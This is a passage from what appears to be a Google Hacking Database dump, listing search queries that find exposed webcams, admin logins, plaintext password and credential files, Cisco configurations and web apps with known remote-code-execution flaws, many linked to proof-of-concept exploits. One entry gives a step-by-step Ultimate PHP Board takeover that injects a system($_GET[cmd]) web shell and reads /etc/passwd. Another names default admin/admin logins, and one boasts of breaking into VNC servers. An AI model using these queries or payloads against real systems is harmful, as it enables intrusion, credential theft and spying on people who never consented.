<br>
Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.<br>
This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.<br>
<br>
Learn more about Webalizer(http://www.mrunix.net/webalizer/).[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1551]]
[[start][1552]
[[title]Display Cameras intitle:"Express6 Live Image"[title]]
[[descr]Express6 live video controller.<br>
Displays video from "Netlive Cameras" found in this search:<br>
http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416<br>
Several new cameras found in this search.[descr]]
[[url]http://www.google.com/search?q=%22Display+Cameras%22+intitle:%22Express6+Live+Image%22&hl=en&lr=&filter=0[url]]
[[dork]"Display Cameras" intitle:"Express6 Live Image"[dork]]
[end][1552]]
[[start][1553]
[[title]intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml[[title]]
[[descr]The SNT-V304 Video Network Station.<br>
Sony's network camera control station.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Sony+SNT-V304+Video+Network+Station%22+inurl:hsrindex.shtml&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml[dork]]
[end][1553]]
[[start][1554]
[[title]"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software released"[title]]
[[descr]this dork is for Mambo 4.5.2x Globals overwrite / remote command execution <br>
<br>
<br>
exploit:<br>
http://rgod.altervista.org/mambo452_xpl.html [descr]]
[[url]http://www.google.com/search?hl=en&q=%22Copyright+2000+-+2005+Miro+International+Pty+Ltd.+All+rights+reserved%22+%22Mambo+is+Free+Software+released%22[url]]
[[dork]"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software released"[dork]]
[end][1554]]
[[start][1555]
[[title]inurl:wp-mail.php + "There doesn't seem to be any new mail."[title]]
[[descr]This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.<br>
<br>
If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s).[descr]]
[[url]http://www.google.com/search?q=inurl%3Awp-mail.php++%2B+%22There+doesn%27t+seem+to+be+any+new+mail.%22&btnG=Search[url]]
[[dork]inurl:wp-mail.php + "There doesn't seem to be any new mail."[dork]]
[end][1555]]
[[start][1556]
[[title]("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column, Romance, eFiction")[[title]]
[[descr]eFiction <=2.0 multiple vulnerabilities<br>
<br>
advisory e poc exploit:<br>
http://rgod.altervista.org/efiction2_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%28%22Skin+Design+by+Amie+of+Intense%22%29%7C%28%22Fanfiction+Categories%22+%22Featured+Stories%22%29%7C%28%22default2%2C+3column%2C+Romance%2C+eFiction%22%29&filter=0[url]]
[[dork]("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column, Romance, eFiction")[dork]]
[end][1556]]
[[start][1557]
[[title]"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)[[title]]
[[descr]dork: "Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b) <br>
<br>
<br>
this is a very old vulnerability discovered by Xanthic, can't find it in GHDB <br>
and I am surprised of how it still works... <br>
<br>
register, login, go to: <br>
<br>
http://[target]/[path_to_upb]/admin_members.php <br>
<br>
edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! <br>
You see Admin Panel link as I see it? <br>
<br>
The only link to the advisory that I found is this (in Italian): <br>
<br>
http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it <br>
<br>
<br>
and I have remote commads xctn for this now, edit site title with this code: <br>
<br>
Ultimate PHP Board"; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " <br>
<br>
now in config.dat we have: <br>
<br>
... <br>
$title="Ultimate PHP Board "; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " "; <br>
... <br>
<br>
in header.php we have: <br>
<br>
... <br>
include "./db/config.dat"; <br>
... <br>
<br>
so you can launch commands: <br>
<br>
http://[target]/[path]/header.php?cmd=cat%20/etc/passwd[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+UPB%22+%28b+1.0%29%7C%281.0+final%29%7C%28Public+Beta+1.0b%29[url]]
[[dork]"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)[dork]]
[end][1557]]
[[start][1558]
[[title]"powered by GuppY v4"|"Site créé avec GuppY v4"[title]]
[[descr]Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues<br>
<br>
advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/guppy459_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%22powered+by+GuppY+v4%22%7C%22Site+cr%C3%A9%C3%A9+avec+GuppY+v4%22[url]]
[[dork]"powered by GuppY v4"|"Site créé avec GuppY v4"[dork]]
[end][1558]]
[[start][1559]
[[title]"Welcome to the directory listing of" "NetworkActiv-Web-Server"[[title]]
[[descr]this is for NetworkActiv-Web-Server directory listing[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Welcome+to+the+directory+listing+of%22+%22NetworkActiv-Web-Server%22&btnG=Google+Search[url]]
[[dork]"Welcome to the directory listing of" "NetworkActiv-Web-Server"[dork]]
[end][1559]]
[[start][1560]
[[title]intitle:"Snap Server" intitle:"Home" "Active Users"[title]]
[[descr]This an online device, you can search for unpassworded shares on Snap Appliance Server.<br>
<br>
Moderator notes:<br>
This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:<br>
<br>
http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+server<br>
http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180<br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22Snap+Server%22+intitle%3A%22Home%22+%22Active+Users%22&btnG=Google+Search[url]]
[[dork]intitle:"Snap Server" intitle:"Home" "Active Users"[dork]]
[end][1560]]
[[start][1561]
[[title]"Powered by Xaraya" "Copyright 2005"[title]]
[[descr]Xaraya <=1.0.0 RC4 Denial of Service<br>
<br>
explaination: <br>
http://rgod.altervista.org/xarayaDOS.html<br>
<br>
exploit:<br>
http://rgod.altervista.org/xarayaDOS_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+Xaraya%22+%22Copyright+2005%22&filter=0[url]]
[[dork]"Powered by Xaraya" "Copyright 2005"[dork]]
[end][1561]]
[[start][1562]
[[title]"parent directory" +proftpdpasswd[[title]]
[[descr]User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22parent+directory%22+%2Bproftpdpasswd&btnG=Google+Search[url]]
[[dork]"parent directory" +proftpdpasswd[dork]]
[end][1562]]
[[start][1563]
[[title]"This website powered by PHPX" -demo[[title]]
[[descr]this is the dork for PhpX <= 3.5.9 Sql injection /login bypass vulnerability<br>
<br>
advisory & poc exploit: <br>
http://rgod.altervista.org/phpx_359_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%22This+website+powered+by+PHPX%22+-demo[url]]
[[dork]"This website powered by PHPX" -demo[dork]]
[end][1563]]
[[start][1564]
[[title]"Warning: Installation directory exists at" "Powered by Zen Cart" -demo[[title]]
[[descr]by this dork you can find fresh installations of Zen-Cart<br>
<br>
see Full Disclosure forums fore details... ;)[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Warning%3A+Installation+directory+exists+at%22+%22Powered+by+Zen+Cart%22+-demo[url]]
[[dork]"Warning: Installation directory exists at" "Powered by Zen Cart" -demo[dork]]
[end][1564]]
[[start][1566]
[[title]"Based on DoceboLMS 2.0"[title]]
[[descr]advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/docebo204_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22Based+on+DoceboLMS+2.0%22&hl=en&lr=&start=50&sa=N[url]]
[[dork]"Based on DoceboLMS 2.0"[dork]]
[end][1566]]
[[start][1567]
[[title]"2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"[title]]
[[descr]this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/sugar_suite_40beta.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%222005+SugarCRM+Inc.+All+Rights+Reserved%22+%22Powered+By+SugarCRM%22[url]]
[[dork]"2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"[dork]]
[end][1567]]
[[start][1568]
[[title]inurl:Printers/ipp_0001.asp[[title]]
[[descr]Thanks to Windows 2003 Remote Printing[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3APrinters%2Fipp_0001.asp[url]]
[[dork]inurl:Printers/ipp_0001.asp[dork]]
[end][1568]]
[[start][1569]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1569]]
[[start][1570]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1570]]
[[start][1571]
[[title]"Powered By phpCOIN 1.2.2"[title]]
[[descr]PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure<br>
<br>
advisory:<br>
http://rgod.altervista.org/phpcoin122.html<br>
<br>
more generic:<br>
<br>
"Powered By phpCOIN"<br>
to see previous verions (not tested) [descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+By+phpCOIN+1.2.2%22[url]]
[[dork]"Powered By phpCOIN 1.2.2"[dork]]
[end][1571]]
[[start][1572]
[[title]intext:"Powered by SimpleBBS v1.1"*[[title]]
[[descr]Vulnerability Description<br>
<br>
SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.<br>
<br>
Solution Description<br>
<br>
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.<br>
<br>
Products:<br>
<br>
* SimpleMedia SimpleBBS 1.1 Affected<br>
<br>
Vulnerability classification:<br>
<br>
* Remote vulnerability<br>
* Input manipulation attack<br>
* Impact on integrity<br>
* Exploit unavailable<br>
* Verified<br>
<br>
More info on Vuln: http://www.securityfocus.com/bid/15594[descr]]
[[url]http://www.google.com/search?q=intext%3A%22Powered+by+SimpleBBS+v1.1%22*&num=100[url]]
[[dork]intext:"Powered by SimpleBBS v1.1"*[dork]]
[end][1572]]
[[start][1573]
[[title]"Site powered By Limbo CMS"[title]]
[[descr]this is the dork for Limbo Cms <= 1.0.4.2 _SERVER[] overwrite / remote code execution<br>
<br>
advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/limbo1042_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22Site+powered+By+Limbo+CMS%22&hl=en&lr=&start=10&sa=N[url]]
[[dork]"Site powered By Limbo CMS"[dork]]
[end][1573]]
[[start][1575]
[[title]inurl:ventrilo_srv.ini adminpassword[[title]]
[[descr]This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Aventrilo_srv.ini+adminpassword[url]]
[[dork]inurl:ventrilo_srv.ini adminpassword[dork]]
[end][1575]]
[[start][1576]
[[title]inurl:guestbook/guestbooklist.asp "Post Date" From Country[[title]]
[[descr]A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threaded<br>
<br>
Several ways of finding the vulnerable file:<br>
Guestbook (the above dork): inurl:guestbook/guestbooklist.asp "Post Date" From Country<br>
Results 1 - 21 of 123<br>
Announcement: inurl:MainAnnounce1.asp "show all"<br>
Results 1 -20 of 86<br>
WebDirectory: inurl:webdirectory "Total Available Web Sites" Search<br>
Results 1 - 4 of 5<br>
MailingList: inurl:maillinglist/emailsadd.asp<br>
Results 1 - 6 of 6<br>
<br>
note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.<br>
The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=inurl%3Aguestbook%2Fguestbooklist.asp+%22Post+Date%22+From+Country[url]]
[[dork]inurl:guestbook/guestbooklist.asp "Post Date" From Country[dork]]
[end][1576]]
[[start][1577]
[[title]inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net[[title]]
[[descr]Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login.[descr]]
[[url]http://www.google.com/search?q=inurl:/Merchant2/admin.mv+%7C+inurl:/Merchant2/admin.mvc+%7C+intitle:%22Miva+Merchant+Administration+Login%22+-inurl:cheap-malboro.net&num=100&hl=en&lr=&filter=0[url]]
[[dork]inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net[dork]]
[end][1577]]
[[start][1578]
[[title]intitle:"Admin login" "Web Site Administration" "Copyright"[title]]
[[descr]Sift Group makes a web site administration product which can be accessed via a web browser. This dork locates their admin login.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Admin+login%22+%22Web+Site+Administration%22+%22Copyright%22+&num=100&hl=en&lr=&filter=0[url]]
[[dork]intitle:"Admin login" "Web Site Administration" "Copyright" [dork]]
[end][1578]]
[[start][1579]
[[title]intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net[[title]]
[[descr]b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login.[descr]]
[[url]http://www.google.com/search?q=intitle:%22b2evo+%3E+Login+form%22+%22Login+form.+You+must+log+in!+You+will+have+to+accept+cookies+in+order+to+log+in%22++-demo+-site:b2evolution.net&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net[dork]]
[end][1579]]
[[start][1580]
[[title](intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob[[title]]
[[descr]WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%28intitle%3AWebStatistica+inurl%3Amain.php%29+%7C+%28intitle%3A%22WebSTATISTICA+server%22%29+-inurl%3Astatsoft+-inurl%3Astatsoftsa+-inurl%3Astatsoftinc.com+-edu+-software+-rob_2926+-crack.ru+-edeco.cn[url]]
[[dork](intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob_2926 -crack.ru -edeco.cn[dork]]
[end][1580]]
[[start][1581]
[[title]inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl[[title]]
[[descr]Information about proxy servers, internal ip addresses and other network sensitive stuff.<br>
[descr]]
[[url]http://www.google.com/search?q=inurl%3Aproxy+%7C+inurl%3Awpad+ext%3Apac+%7C+ext%3Adat+findproxyforurl[url]]
[[dork]inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl[dork]]
[end][1581]]
[[start][1582]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1582]]
[[start][1583]
[[title]inurl:/cgi-bin/pass.txt[[title]]
[[descr]Passwords[descr]]
[[url]http://www.google.com/search?complete=1&hl=en&lr=&q=inurl%3A%2Fcgi-bin%2Fpass.txt[url]]
[[dork]inurl:/cgi-bin/pass.txt[dork]]
[end][1583]]
[[start][1588]
[[title]intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"[title]]
[[descr]CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398<br>
<br>
Moderator note: "Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke"descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+by+CubeCart+3.0.6%22+intitle%3A%22Powered+by+CubeCart%22&btnG=Google+Search[url]]
[[dork]intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"[dork]]
[end][1588]]
[[start][1589]
[[title]"Emergisoft web applications are a part of our"[title]]
[[descr]Hospital patient management system, in theory it could be dangerous.[descr]]
[[url]http://www.google.com/search?q=%22Emergisoft+web+applications+are+a+part+of+our%22&hl=en&filter=0[url]]
[[dork]"Emergisoft web applications are a part of our"[dork]]
[end][1589]]
[[start][1590]
[[title]inurl:ovcgi/jovw[[title]]
[[descr]An HP Java network management tool. It is a sign that a network may not be configured properly.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Aovcgi%2Fjovw[url]]
[[dork]inurl:ovcgi/jovw[dork]]
[end][1590]]
[[start][1591]
[[title]inurl:/img/vr.htm[[title]]
[[descr]Linksys wireless G Camera.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fimg%2Fvr.htm[url]]
[[dork]inurl:/img/vr.htm[dork]]
[end][1591]]
[[start][1592]
[[title]intitle:Axis inurl:"/admin/admin.shtml"[title]]
[[descr]Similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration.[descr]]
[[url]http://www.google.com/search?q=intitle:Axis+inurl:%22/admin/admin.shtml%22&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:Axis inurl:"/admin/admin.shtml"[dork]]
[end][1592]]
[[start][1593]
[[title]DCS inurl:"/web/login.asp"[title]]
[[descr]Login pages for the DCS-950 Web Camera. Even comes with a built in microphone.[descr]]
[[url]http://www.google.com/search?q=DCS+inurl:%22/web/login.asp%22&hl=en&lr=lang_en&c2coff=1&filter=0[url]]
[[dork]DCS inurl:"/web/login.asp"[dork]]
[end][1593]]
[[start][1596]
[[title]intitle:"Dell Laser Printer *" port_0 -johnny.ihackstuff[[title]]
[[descr]Dell laser printers. This search finds different results that dork id 1077.[descr]]
[[url]http://www.google.com/search?hl=en&q=*+intitle%3A%22Dell+Laser+Printer+*%22+port_0+-johnny.ihackstuff[url]]
[[dork]* intitle:"Dell Laser Printer *" port_0 -johnny.ihackstuff[dork]]
[end][1596]]
[[start][1597]
[[title]filetype:bak createobject sa[[title]]
[[descr]This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters "sa" (default SQL server admin id) and "createobject" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use "server=127.0.0.1" so you know IIS & SQL Server are running on the same box.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Abak+createobject+sa[url]]
[[dork]filetype:bak createobject sa[dork]]
[end][1597]]
[[start][1598]
[[title]"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com[[title]]
[[descr]betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins. [descr]]
[[url]http://www.google.com/search?q=%22bp+blog+admin%22+intitle:login+%7C+intitle:admin+-site:johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com[dork]]
[end][1598]]
[[start][1599]
[[title]inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"[title]]
[[descr]This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. At time of submitting there are 21 results.<br>
<br>
Also a search for the logins:<br>
inurl:"Results/editor/login.asp"<br>
"Database Editor Login" "Results Page"descr]]
[[url]http://www.google.com/search?q=inurl:%22editor/list.asp%22+%7C+inurl:%22database_editor.asp%22+%7C+inurl:%22login.asa%22+%22are+set%22&num=100&hl=en&lr=&filter=0[url]]
[[dork]inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"[dork]]
[end][1599]]
[[start][1600]
[[title]ext:passwd -intext:the -sample -example[[title]]
[[descr]Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search.[descr]]
[[url]http://www.google.com/search?q=ext:passwd+-intext:the+-sample+-example&filter=0[url]]
[[dork]ext:passwd -intext:the -sample -example[dork]]
[end][1600]]
[[start][1601]
[[title]enable password | secret "current configuration" -intext:the[[title]]
[[descr]Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, "secret 5" and "password 7" passwords.[descr]]
[[url]http://www.google.com/search?q=enable+password+%7C+secret+%22current+configuration%22+-intext%3Athe&filter=0[url]]
[[dork]enable password | secret "current configuration" -intext:the[dork]]
[end][1601]]
[[start][1602]
[[title]ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn[[title]]
[[descr]Search for plaintext database credentials in ASA and BAK files.<br>
[descr]]
[[url]http://www.google.com/search?q=ext:asa+%7C+ext:bak+intext:uid+intext:pwd+-%22uid..pwd%22+database+%7C+server+%7C+dsn&filter=0[url]]
[[dork]ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn[dork]]
[end][1602]]
[[start][1603]
[[title]intext:"PhpGedView Version" intext:"final - index" -inurl:demo[[title]]
[[descr]PHPGedView <=3.3.7 remote code execution<br>
<br>
advisory & poc exploit: <br>
<br>
http://rgod.altervista.org/phpgedview_337_xpl.html[descr]]
[[url]http://www.google.com/search?q=intext:%22PhpGedView+Version%22+intext:%22final+-+index%22+-inurl:demo&hl=en&lr=&start=30&sa=N[url]]
[[dork]intext:"PhpGedView Version" intext:"final - index" -inurl:demo[dork]]
[end][1603]]
[[start][1604]
[[title]intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo[[title]]
[[descr]DEV cms <=1.5 SQL injection <br>
<br>
advisory & poc exploit: <br>
<br>
http://rgod.altervista.org/dev_15_sql_xpl.html [descr]]
[[url]http://www.google.com/search?hl=it&q=intext%3A%22Powered+by+DEV+web+management+system%22+-dev-wms.sourceforge.net+-demo&btnG=Cerca&lr=[url]]
[[dork]intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo[dork]]
[end][1604]]
[[start][1605]
[[title]intitle:"phpDocumentor web interface"[title]]
[[descr]Php Documentor < = 1.3.0 rc4 remote code xctn <br>
<br>
dork: intitle:"phpDocumentor web interface"<br>
<br>
advisory & poc exploit:<br>
<br>
http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html[descr]]
[[url]http://www.google.com/search?q=intitle:%22phpDocumentor+web+interface%22&hl=it&lr=&start=10&sa=N&filter=0[url]]
[[dork]intitle:"phpDocumentor web interface"[dork]]
[end][1605]]
[[start][1606]
[[title]inurl:"tmtrack.dll?"[title]]
[[descr]This query shows installations of Serena Teamtrack. (www.serena.com).<br>
<br>
You may be able to adjust the application entry point, by providing a command after the "tmtrack.dll?" like this<br>
<br>
tmtrack.dll?LoginPage<br>
tmtrack.dll?View&Template=view<br>
and more.[descr]]
[[url]http://www.google.com/search?q=inurl:%22tmtrack.dll%3F%22&hl=de&lr=&start=0&sa=N[url]]
[[dork]inurl:"tmtrack.dll?"[dork]]
[end][1606]]
[[start][1607]
[[title]"intitle:3300 Integrated Communications Platform" inurl:main.htm[[title]]
[[descr]logon portal to the mitel 330 integrated communications platform.<br>
<br>
[Mitel® 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ][descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22intitle%3A3300+Integrated+Communications+Platform%22+inurl%3Amain.htm&btnG=Google+Search[url]]
[[dork]"intitle:3300 Integrated Communications Platform" inurl:main.htm[dork]]
[end][1607]]
[[start][1608]
[[title]intitle:Ovislink inurl:private/login[[title]]
[[descr]Ovislink vpn login page.[descr]]
[[url]http://www.google.com/search?q=intitle%3AOvislink+inurl%3Aprivate%2Flogin+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]intitle:Ovislink inurl:private/login [dork]]
[end][1608]]
[[start][1609]
[[title]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[[title]]
[[descr]A variation on Jeffball55's original Intellinet Ip Camera.<br>
This search finds several more web cams.<br>
A suggested secondary search:<br>
"Administrator Menu" "camera Name" "Location" "frame rate" intitle:network.camera -pdf<br>
Thanks jeffball.<br>
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22%3A%3A%3A%3A%3A+INTELLINET+IP+Camera+Homepage+%3A%3A%3A%3A%3A%22+OR+inurl%3A%2Fmain_activex.asp+OR+inurl%3A%2Fmain_applet.cgi&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.m[url]]
[[dork]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[dork]]
[end][1609]]
[[start][1610]
[[title]filetype:pl intitle:"Ultraboard Setup"[title]]
[[descr]Setup pages to the ultraboard system.[descr]]
[[url]http://www.google.com/search?q=filetype%3Apl+intitle%3A%22Ultraboard+Setup%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]filetype:pl intitle:"Ultraboard Setup"[dork]]
[end][1610]]
[[start][1611]
[[title]inurl:install.pl intext:"Reading path paramaters" -edu[[title]]
[[descr]Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible[descr]]
[[url]http://www.google.com/search?q=inurl:install.pl+intext:%22Reading+path+paramaters%22+-edu&hl=en&hs=cFH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:install.pl intext:"Reading path paramaters" -edu[dork]]
[end][1611]]
[[start][1612]
[[title]inurl:build.err[[title]]
[[descr]General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too.[descr]]
[[url]http://www.google.com/search?q=inurl%3Abuild.err+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]inurl:build.err [dork]]
[end][1612]]
[[start][1613]
[[title]intext:ViewCVS inurl:Settings.php[[title]]
[[descr]CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc.[descr]]
[[url]http://www.google.com/search?q=intext%3AViewCVS+inurl%3ASettings.php+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]intext:ViewCVS inurl:Settings.php [dork]]
[end][1613]]
[[start][1614]
[[title]"Powered by Midmart Messageboard" "Administrator Login"[title]]
[[descr]Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up.[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+Midmart+Messageboard%22+%22Administrator+Login%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]"Powered by Midmart Messageboard" "Administrator Login"[dork]]
[end][1614]]
[[start][1615]
[[title]inurl:install.pl intitle:GTchat[[title]]
[[descr]Gtchat install file.<br>
You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.[descr]]
[[url]http://www.google.com/search?q=inurl:install.pl+intitle:GTchat+&hl=en&hs=yTH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:install.pl intitle:GTchat [dork]]
[end][1615]]
[[start][1616]
[[title]inurl:rpSys.html[[title]]
[[descr]Web configuration pages for various types of systems. Many of these systems are not password protected.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1616]]
[[start][1617]
[[title]intitle:"Horde :: My Portal" -"Tickets"[title]]
[[descr]Hi<br>
It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...<br>
<br>
Edited by CP[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&rls=GBSA%2CGBSA%3A2006-05%2CGBSA%3Aen&q=intitle%3A%22Horde+%3A%3A+My+Portal%22+-%22%5BTickets%22&btnG=Search[url]]
[[dork]intitle:"Horde :: My Portal" -"[Tickets"[dork]]
[end][1617]]
[[start][1618]
[[title]filetype:reg reg +intext:”WINVNC3”[[title]]
[[descr]This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:<br>
\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or<br>
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password<br>
<br>
If you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.<br>
<br>
[descr]]
